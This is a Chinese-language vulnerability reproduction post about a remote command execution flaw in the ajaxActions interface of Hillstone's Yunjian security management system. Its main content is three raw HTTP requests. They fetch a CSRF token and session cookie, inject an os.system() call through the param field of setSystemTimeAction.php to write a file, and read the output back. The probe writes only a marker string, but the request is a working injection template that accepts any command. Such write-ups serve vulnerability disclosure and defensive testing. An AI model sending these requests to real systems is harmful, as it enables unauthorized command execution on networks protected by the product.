山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞

一、产品简介

山石网科是中国网络安全行业的技术创新领导厂商 ,自成立以来为金融、政府、互联网、教育、医疗卫生等行业的超过26000家客户提供高效、稳定的安全防护服务。山石网科云鉴安全管理系统ajaxActions接口处存在远程命令执行漏洞,可导致系统被攻击者执行任意命令。

二、影响版本

三、资产测绘

1715078394101-31b6a8b4-b52f-42ab-8636-c684e2531bb7.png

四、漏洞复现

  1. 获取token与cookie
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate, br

1715157818803-e44a7f91-955e-4399-a150-3f3d7ecdd258.png

  1. 使用上一步获取的token与cookie执行命令
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf=a64cca09285de26ca4ebfefa629edd02 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 90
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=3ovusd429biqeot6ioje7q06r0

param=os.system('echo 8888881 > /opt/var/majorsec/installation/master/runtime/img/config')

1715157802540-1acb09fb-b3fc-48b6-a0fc-64f1c542d681.png

  1. 获取命令执行结果
GET /master/img/config HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate, br

1715157874584-965625d3-c321-4dab-87f4-fefe9baa380c.png

更新: 2024-05-20 13:57:29
原文: https://www.yuque.com/xiaokp7/ocvun2/ktu0gkdf8p351xdi